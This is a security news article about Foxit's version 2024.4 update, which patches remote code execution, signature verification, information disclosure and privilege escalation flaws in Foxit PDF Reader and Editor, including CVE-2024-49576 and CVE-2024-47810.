CVE-2024-49576 and CVE-2024-47810: Foxit Addresses Remote Code Execution Flaws

Foxit has released a crucial security update for its widely used Foxit PDF Reader and Foxit PDF Editor. The update, version 2024.4, resolves multiple vulnerabilities that pose significant risks, including remote code execution, privilege escalation, and information disclosure.

The security bulletin identifies several vulnerabilities affecting earlier versions of Foxit PDF Reader and Editor. These include:

• Untrusted URL Invocation: Attackers could exploit this flaw by embedding malicious code or images in PDF documents. As Foxit explained, “This occurs as the application loads images from all resources (including those untrusted) when parsing the image resources or fails to properly request user confirmation before getting or posting content from external HTTP servers.”
• Incorrect Signature Verification: Manipulated XFA documents could deceive users into signing altered documents. Foxit notes, “The application improperly ignores the changes to the ‘/NeedsRendering’ key or ‘TextField’ field when verifying the XFA documents.”
• Information Disclosure: Flaws in the “app.openDoc” and “LaunchAction” functions allowed attackers to exfiltrate sensitive data from the file system or SMB servers. The bulletin highlights that the application “fails to provide a reasonable prompt for user confirmation” in these scenarios.
• Use-After-Free Vulnerabilities: Certain AcroForms and 3D page objects could crash the application, enabling attackers to execute remote code. Vulnerabilities CVE-2024-49576 and CVE-2024-47810 were linked to this issue.
• DLL Hijacking and Privilege Escalation: Improper validation of secure search paths and update mechanisms could allow attackers to execute arbitrary code with SYSTEM privileges.

Foxit acknowledged contributions from security researchers, including Jörn Henkel, Mat Powell from Trend Micro Zero Day Initiative, and KPC of Cisco Talos.

The vulnerabilities impact:

• Foxit PDF Reader: Versions 2024.3.0.26795 and earlier.
• Foxit PDF Editor: A range of versions from 11.x to 2024.3.

These vulnerabilities affect Windows platforms, and users are encouraged to upgrade to version 2024.4 or later immediately.

Related Posts:

• Foxit Reader exists multiple security flaws that can lead to remote code execution
• Multiple RCE Vulnerabilities in Foxit PDF Reader and Editor
• Foxit PDF Reader and Editor Users Urged to Update After Exploited Flaws Revealed
• 6 Arbitrary Code Execution Flaws Patched in Foxit Reader
• Critical Use-After-Free Vulnerability Discovered in Foxit Reader (CVE-2024-28888)